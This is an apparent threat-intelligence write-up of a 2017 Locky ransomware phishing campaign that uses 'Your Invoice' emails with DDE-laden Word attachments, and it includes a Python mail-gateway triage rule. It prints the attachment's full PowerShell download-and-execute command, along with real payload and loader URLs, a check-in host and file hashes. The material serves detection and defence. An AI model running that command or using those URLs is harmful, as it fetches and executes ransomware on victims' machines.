2017-10-24 Locky "Your Invoice xxxxxx"

Racco42, Oct 24th, 2017
2017-10-24: #locky email phishing campaign "Your Invoice xxxxxx"

Email sample:
----------------------------------------------------------------------------------------------------------------
From: "Anna" <Anna.Priestman@iscil.org>
Date: Tue, 24 Oct 2017 17:23:04 +0700
Subject: Your Invoice 99707

Your Invoice is attached.

If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.

Invoice: Invoice_file_54654.doc
----------------------------------------------------------------------------------------------------------------
- the email has no To: header
- the subject is "Your Invoice <5-6 digits>"
- the attached file "Invoice_file_<5-6 digits>.doc" is an MS Word file containing a DDE exploit which executes the following command:

C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' http://transmercasa.com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"
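The three email-level indicators above (missing To: header, subject pattern, attachment name pattern) plus a crude check for a DDE field marker in the attachment bytes can be turned into a mail-gateway triage rule. The following is an added example, not part of the original paste; the message and the stand-in "document" bytes are constructed here, and a real .doc would need proper OLE parsing rather than a byte scan.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Indicators taken from the campaign description above.
SUBJECT_RE = re.compile(r"^Your Invoice \d{5,6}$")
ATTACH_RE = re.compile(r"^Invoice_file_\d{5,6}\.doc$", re.IGNORECASE)
# DDE field keywords as they may appear inside a Word file (ASCII or UTF-16LE).
DDE_MARKERS = [b"DDEAUTO", b"DDE ",
               "DDEAUTO".encode("utf-16-le"), "DDE ".encode("utf-16-le")]


def attachment_has_dde(payload: bytes) -> bool:
    """Crude byte scan for a DDE field keyword; a full check would parse the OLE streams."""
    return any(marker in payload for marker in DDE_MARKERS)


def score_message(msg: EmailMessage) -> list[str]:
    """Return the campaign indicators this message matches (empty list = no match)."""
    hits = []
    if msg.get("To") is None:
        hits.append("missing To: header")
    subject = msg.get("Subject", "")
    if SUBJECT_RE.match(subject):
        hits.append(f"subject pattern: {subject!r}")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if ATTACH_RE.match(name):
            hits.append(f"attachment name pattern: {name!r}")
            if attachment_has_dde(part.get_payload(decode=True) or b""):
                hits.append(f"DDE field marker in {name!r}")
    return hits


def score_raw(raw: bytes) -> list[str]:
    """Parse a raw RFC 5322 message and score it."""
    return score_message(email.message_from_bytes(raw, policy=policy.default))


def build_sample() -> EmailMessage:
    """Constructed sample mirroring the paste's email; the attachment is a stand-in, not the real document."""
    msg = EmailMessage()
    msg["From"] = '"Anna" <Anna.Priestman@iscil.org>'
    msg["Date"] = "Tue, 24 Oct 2017 17:23:04 +0700"
    msg["Subject"] = "Your Invoice 99707"
    msg.set_content("Your Invoice is attached.\n")
    # OLE magic followed by a UTF-16LE DDEAUTO field text (constructed, not a real .doc).
    fake_doc = b"\xd0\xcf\x11\xe0" + r"DDEAUTO c:\\Windows\\System32\\cmd.exe".encode("utf-16-le")
    msg.add_attachment(fake_doc, maintype="application", subtype="msword",
                       filename="Invoice_file_54654.doc")
    return msg
```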

The command tries to download an additional PowerShell script from one of the following locations:
http://transmercasa.com/JHGGsdsw6
http://urcho.com/JHGGsdsw6

This PowerShell script downloads the malware loader from one of:
http://tatianadecastelbajac.fr/kjhgFG
http://video.rb-webdev.de/kjhgFG
http://themclarenfamily.com/kjhgFG

Malware loader:
- SHA256: 6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b, MD5: eae849f6510db451f4fbdb780b5d49aa
- VT: https://www.virustotal.com/en/file/6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b/analysis/1508841473/
- HA (doc file): https://www.reverse.it/sample/ea77730c72da80c9f375b8474ff73af189429a0d1e4b92c6af7341391f73edae?environmentId=100
- the loader checks in via a POST request to http://gdiscoun.org
- the loader downloads the encoded malware from http://webhotell.enivest.no/cuYT39.enc

Malware:
- Locky, .asasin variant